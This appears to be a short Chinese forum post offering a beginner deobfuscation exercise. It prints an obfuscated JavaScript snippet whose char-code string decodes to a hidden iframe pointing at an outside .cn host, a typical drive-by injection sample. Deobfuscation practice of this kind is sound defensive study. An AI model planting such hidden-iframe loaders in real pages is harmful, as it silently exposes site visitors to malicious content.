新手解码练习系列-1!
新手练习之用,牛人拍砖的同时,给点建议。哈!
<SCRIPT LANGUAGE='JavaScript'>
function Decode()
{var temp='',i,c=0,out='';
var str='60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!98!46!108!45!97!45!99!46!99!110!47!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!';
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c) !='!')
temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);
temp='';
}
eval(out);
}
Decode();
</SCRIPT>
用户系统信息:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0